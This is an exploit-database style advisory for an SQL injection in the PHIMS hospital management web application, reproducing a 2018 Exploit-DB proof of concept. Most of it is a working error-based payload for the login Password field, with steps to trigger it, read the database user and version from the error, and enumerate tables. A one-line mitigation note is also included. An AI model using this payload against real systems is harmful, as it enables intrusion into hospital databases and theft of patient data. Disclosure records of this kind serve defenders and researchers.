PHIMS - Hospital Management Information System - 'Password' SQL Injection

vendor:

PHIMS - Hospital Management Information System

by:

Borna nematzadeh

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: PHIMS - Hospital Management Information System

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Web

2018

PHIMS – Hospital Management Information System – ‘Password’ SQL Injection

The vulnerability allows an attacker to inject sql commands.

Mitigation:

Implement proper input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title:  PHIMS - Hospital Management Information System - 'Password' SQL Injection
# Dork: N/A
# Date: 2018-02-16
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/phims/14974225?s_rank=1566
# Version: All version
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands.
# # # # #
# Proof of Concept :

SQLI :


# Parameter : Password (POST)
#    Type: Error based
#    Title:  MariaDB >= 10.2.11 AND Error based - extractvalue (XPATH query)
#    Payload : 1" and extractvalue(1,concat(0x3a,user(),0x3a,version()))#
#######################################
# Discrption : The 'password' field is vulnerable in this script
('Password' parameter).First inject payload into this parameter.
# then put anything in username (like:anything@anything.anything) and click
login. You will have XPATH syntax
error in the next page that contains user and db_name .
# You can find all tables and any information from database by using XPATH
query .


Username : anything@anything.anything
Password : 1" and extractvalue(1,concat(0x3a,user(),0x3a,version()))#